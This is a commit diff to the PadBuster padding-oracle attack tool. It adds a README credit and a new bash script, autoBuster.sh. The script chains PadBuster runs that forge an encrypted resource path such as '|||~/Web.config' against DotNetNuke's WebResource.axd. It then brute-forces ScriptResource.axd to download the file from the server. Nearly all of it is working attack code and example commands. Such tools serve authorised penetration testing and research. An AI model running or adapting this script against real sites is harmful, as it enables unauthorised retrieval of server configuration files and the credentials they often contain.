Many different improvements with new parameters and an automatic file retrieval script

README

@@ -5,12 +5,16 @@ Author: Brian Holyfield - Gotham Digital Science ([email protected])
 Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
 techniques and S.Vaudenay for initial discovery of the attack. Credits also
 to James M. Martin ([email protected]) for sharing proof of concept exploit
-code for performing various brute force attack techniques.
+code for performing various brute force attack techniques. Credits for variuos
+improvements to GW ([email protected] or http://gw.tnode.com/) - Viris.
 
 PadBuster is a Perl script for automating Padding Oracle Attacks. PadBuster  
 provides the capability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, 
 and perform automated response analysis to determine whether a request is vulnerable 
 to padding oracle attacks.
 
+autoBuster.sh is a script for automatic resource path encoding, bruteforcing and
+file downloading by GW ([email protected] or http://gw.tnode.com/) - Viris.
+
 PadBuster is released under the Reciprocal Public License 1.5 (RPL1.5)
 http://www.opensource.org/licenses/rpl1.5

autoBuster.sh

@@ -0,0 +1,44 @@
+#!/bin/bash
+# Automatic PadBuster runner.
+#
+# Usage:
+#   - modify variables at the beginning of this script
+#   - run:
+#   ./runfile.sh <resource_path> <save_to_file>
+#   ./runfile.sh '|||~/Web.config' 'Web.config'
+#
+# This script uses PadBuster to first encode the given <resource_path> parameter
+# and than using it in the second automated file retrieval mode.
+#
+# For example it runs PadBuster (encoding phase) with parameters like:
+#   ./padBuster.pl 'http://example.com/dotnetnuke/WebResource.axd?d=cUWPUb60YjfipBsfszacsQ2' 'cUWPUb60YjfipBsfszacsQ2' 8 \
+#       -encoding 3 -prefix 'cUWPUb60YjfipBsfszacsQ2' -log \
+#       -auto 100000 \
+#       -runafter "./padBuster.pl 'http://example.com/dotnetnuke/ScriptResource.axd?d=#ENC' '#ENC' 8 -encoding 3 -bruteforce -randomize -log '#DIR' -ignoredistance 55 -auto 100000 -autostore 'files/Web.config.#STAT-#SUM'" \
+#       -plaintext '|||~/Web.config'
+#
+# After encoding the <resource_path> it starts the automatic bruteforcing and
+# downloading phase (or whatever is given for the -runafter parameter). Eg:
+#   ./padBuster.pl 'http://example.com/dotnetnuke/ScriptResource.axd?d=ZXzZXHDtAJS0xXgU2mjYjwAAAAAAAAAA0' 'ZXzZXHDtAJS0xXgU2mjYjwAAAAAAAAAA0' 8 \
+#       -encoding 3 -bruteforce -randomize -log 'PadBuster.28SEP11-55659' \
+#       -ignoredistance 55 -auto 100000 -autostore 'files/Web.config.#STAT-#SUM'
+#
+# PadBuster will try to ignore all useless responses by comparing their
+# difference and storing everything interesting in the directory 'files'.
+#
+# Author: GW <[email protected] or http://gw.tnode.com/>
+
+# Modify these variables:
+PREFIX='cUWPUb60YjfipBsfszacsQ2'
+CRYPTURL="http://example.com/dotnetnuke/WebResource.axd?d=$PREFIX"
+DOWNLOADURL="http://example.com/dotnetnuke/ScriptResource.axd?d=#ENC";
+BLOCKSIZE=8
+
+echo "--- '$1'"
+
+SUBCMD="./padBuster.pl '$DOWNLOADURL' '#ENC' $BLOCKSIZE -encoding 3 -bruteforce -randomize -log '#DIR' -ignoredistance 55"
+if [ "$2" != '' ]; then
+	SUBCMD="$SUBCMD -auto 100000 -autostore 'files/$2.#STAT-#SUM'";
+fi
+./padBuster.pl "$CRYPTURL" "$PREFIX" $BLOCKSIZE -encoding 3 -prefix "$PREFIX" -log -auto 100000 -runafter "$SUBCMD" -plaintext "$1"
+